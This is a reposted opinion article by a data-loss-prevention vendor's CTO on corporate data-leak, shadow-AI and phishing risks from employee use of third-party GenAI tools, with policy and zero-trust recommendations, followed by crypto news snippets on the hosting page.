The enterprise’s love affair with third-party GenAI productivity tools is going strong, even as the increased usage adds pressure to already stretched corporateThe enterprise’s love affair with third-party GenAI productivity tools is going strong, even as the increased usage adds pressure to already stretched corporate

Rising Enterprise GenAI Use Could Pose Risky for Corporate Data

The enterprise’s love affair with third-party GenAI productivity tools is going strong, even as the increased usage adds pressure to already stretched corporate security teams. In the United States, around 75 percent of  leaders / managers and 51 percent of frontline employees use GenAI for productivity. 1 Employees typically access GenAI tools through a browser, using the technology for productivity, research, and content creation. Security issues arise when GenAI uses the information to train itself and to answer general queries. With this in mind, corporate IT departments should review GenAI security now, especially with Gartner predicting that by 2030 more than 40% of global organizations will suffer security incidents due to AI tools.2

Browsers, Third-Party Tools, and Data Leaks

The browser powers much of enterprise GenAI use as it is an easy-to-use gateway to the Internet. As such, it lacks many enterprise-grade protections, such as network endpoint security and data loss prevention protocols.  To understand the security issues with third-party GenAI tools, it helps to see the browser as operating in an information Wild West without the strictness of endpoint security or data loss protection enablement. 

The typical corporate user does not plan to expose  corporate data, but he/she does not understand the path of the information inputted. GenAI platforms are programmed to be always learning, so any data it gets is used for self-training and in answers to other queries.  GenAI does not differentiate between “safe” and sensitive data inputs, meaning customer or employee PII, intellectual property,  and insider corporate knowledge are treated as regular information.

GenAI Data Leaks in the Real World    

In early 2023, Amazon’s internal legal team noticed that outputs from OpenAI’s ChatGPT on coding read the same as answers to problems given to prospective Amazon employees. The company’s employees had been placing data snippets into ChatGPT for tasks like debugging or confirming a correct answer. Unbeknownst to Amazon, ChatGPT then trained itself on the data and included it in all queries, including those from outside the company. Similarly in 2023, Samsung experienced three leaks of confidential information as a result of employees using GenAI. The exposed information included source code, detailed meeting notes, and hardware data. 

As a result of the leaks, Amazon immediately instituted a policy prohibiting the sharing of confidential information on third-party GenAI. Samsung banned GenAI tools for employees, and by December 2025 only certain Samsung departments can use third-party GenAI. Both companies discovered that it is very difficult to delete information from third-party GenAI services once inputted.

The Rise of Shadow GenAI 

Many companies may not have the luxury of discovering and stopping information being used by GenAI because they are not aware that their employees are using them. It is estimated that workers in 90 percent of companies are using chatbots, but they are not letting their IT departments know.3 In addition to data appearing on GenAI platforms, shadow AI use can leave the company vulnerable to more intricate attacks, such as data poisoning, prompt injection attacks, phishing, and other threats. Shadow AI also has compliance risks, with the lack of governance leaving companies vulnerable to fines for not following data privacy protocols.

Malware and Phishing

GenAI tools can be used by threat actors to generate scripts, obfuscate code, or craft social engineering code to discover network vulnerabilities. There have not been many cases of malware spreading by GenAI use, but the instances are expected to rise in the coming years.

GenAI can enable hyper-personalized phishing by generating context-aware emails, deepfakes, or even voice clones. GenAI makes it harder for employees to spot fakes during usage, leading to potential unauthorized access of networks or Intellectual Property.

The Best Company Response to GenAI Use

There are steps a company can take to utilize the benefits of GenAI third-party tools while still keeping their data and compliance in check.

Establish Policies

First, the company should develop and enforce policies on GenAI platform use. The guidelines should include allowable platforms, types of data that can be input, and the departments that are allowed to use these tools. The “rulebook” should also address regulatory compliance, gaining input from the legal and security teams on best practices.

Build a Zero-Trust Architecture

A company should consider a zero-trust architecture to secure access to GenAI, especially browser-based tools. This step could include multi-factor authentication, least-privilege access, data encryption, and real-time monitoring to prevent data loss or unauthorized sharing. The ability to block risky interactions, such as large data uploads, should be enabled.  Finally, the company should conduct regular auditing of all data flows. 

Start Classifying Sensitive Data 

A company should classify sensitive information and implement controls to prevent it from being implemented into GenAI prompts. Similarly, models, datasets, and integration should be monitored to make sure no data poisoning from bad commands being copied from GenAI has taken place.  

Monitor AI Outputs and Mitigate Malware/Phishing Risks

Requiring  reviews of AI-generated code or content for malware or bad information before the information is used can help mitigate threats.  

Make It a Team Effort

The best GenAI protection will come from policies and practices developed across IT, security, business, and legal teams. The policies should be rolled out and updated with employee training.

Scale carefully

Once a company has a good monitoring and response process in place, it can start to scale GenAI use. This increase should occur with an eye to emerging threats in mind.

By understanding GenAI third-party tool security risks, monitoring for shadow use, and building a comprehensive usage and policy rule set, a company can be more confident in its use of GenAI. The goal is to stay aware of emerging threats and to make sure your practices are aligned with data safety and governance mandates.

References:

1: https://www.bcg.com/publications/2025/ai-at-work-momentum-builds-but-gaps-remain

2: https://www.infosecurity-magazine.com/news/gartner-40-firms-hit-shadow-ai/

3: https://fortune.com/2025/08/19/shadow-ai-economy-mit-study-genai-divide-llm-chatbots/

Bio

Zbyněk Sopuch is the CTO of Safetica, a global leader in data loss prevention and insider risk management, protecting close to 1 million devices in 120 countries.  www.safetica.com

About Safetica

Safetica is a global leader in Intelligent Data Security, trusted by organizations in more than 120 countries. Its AI-powered platform unifies data protectioninsider risk managementcompliance readiness, and data discovery across on-premises and cloud environments. Designed to protect sensitive information without disrupting business operations, Safetica helps companies stay compliant, reduce insider risk, and safeguard data wherever work happens.

Learn more at www.safetica.com

Market Opportunity
1 Logo
1 Price(1)
$0.011571
$0.011571$0.011571
+21.09%
USD
1 (1) Live Price Chart
Disclaimer: The articles reposted on this site are sourced from public platforms and are provided for informational purposes only. They do not necessarily reflect the views of MEXC. All rights remain with the original authors. If you believe any content infringes on third-party rights, please contact [email protected] for removal. MEXC makes no guarantees regarding the accuracy, completeness, or timeliness of the content and is not responsible for any actions taken based on the information provided. The content does not constitute financial, legal, or other professional advice, nor should it be considered a recommendation or endorsement by MEXC.

You May Also Like

Ethereum unveils roadmap focusing on scaling, interoperability, and security at Japan Dev Conference

Ethereum unveils roadmap focusing on scaling, interoperability, and security at Japan Dev Conference

The post Ethereum unveils roadmap focusing on scaling, interoperability, and security at Japan Dev Conference appeared on BitcoinEthereumNews.com. Key Takeaways Ethereum’s new roadmap was presented by Vitalik Buterin at the Japan Dev Conference. Short-term priorities include Layer 1 scaling and raising gas limits to enhance transaction throughput. Vitalik Buterin presented Ethereum’s development roadmap at the Japan Dev Conference today, outlining the blockchain platform’s priorities across multiple timeframes. The short-term goals focus on scaling solutions and increasing Layer 1 gas limits to improve transaction capacity. Mid-term objectives target enhanced cross-Layer 2 interoperability and faster network responsiveness to create a more seamless user experience across different scaling solutions. The long-term vision emphasizes building a secure, simple, quantum-resistant, and formally verified minimalist Ethereum network. This approach aims to future-proof the platform against emerging technological threats while maintaining its core functionality. The roadmap presentation comes as Ethereum continues to compete with other blockchain platforms for market share in the smart contract and decentralized application space. Source: https://cryptobriefing.com/ethereum-roadmap-scaling-interoperability-security-japan/
Share
BitcoinEthereumNews2025/09/18 00:25
Ethereum Price Prediction: ETH Targets $10,000 In 2026 But Layer Brett Could Reach $1 From $0.0058

Ethereum Price Prediction: ETH Targets $10,000 In 2026 But Layer Brett Could Reach $1 From $0.0058

Ethereum price predictions are turning heads, with analysts suggesting ETH could climb to $10,000 by 2026 as institutional demand and network upgrades drive growth. While Ethereum remains a blue-chip asset, investors looking for sharper multiples are eyeing Layer Brett (LBRETT). Currently in presale at just $0.0058, the Ethereum Layer 2 meme coin is drawing huge [...] The post Ethereum Price Prediction: ETH Targets $10,000 In 2026 But Layer Brett Could Reach $1 From $0.0058 appeared first on Blockonomi.
Share
Blockonomi2025/09/17 23:45
Shiba Inu Price Prediction: PEPE Holders Looking For The Next 100x Crypto Set Their Sights On Layer Brett Presale

Shiba Inu Price Prediction: PEPE Holders Looking For The Next 100x Crypto Set Their Sights On Layer Brett Presale

While SHIB and PEPE continue to dominate headlines, many early holders are now hunting for the next breakout. Layer Brett […] The post Shiba Inu Price Prediction: PEPE Holders Looking For The Next 100x Crypto Set Their Sights On Layer Brett Presale appeared first on Coindoo.
Share
Coindoo2025/09/18 06:13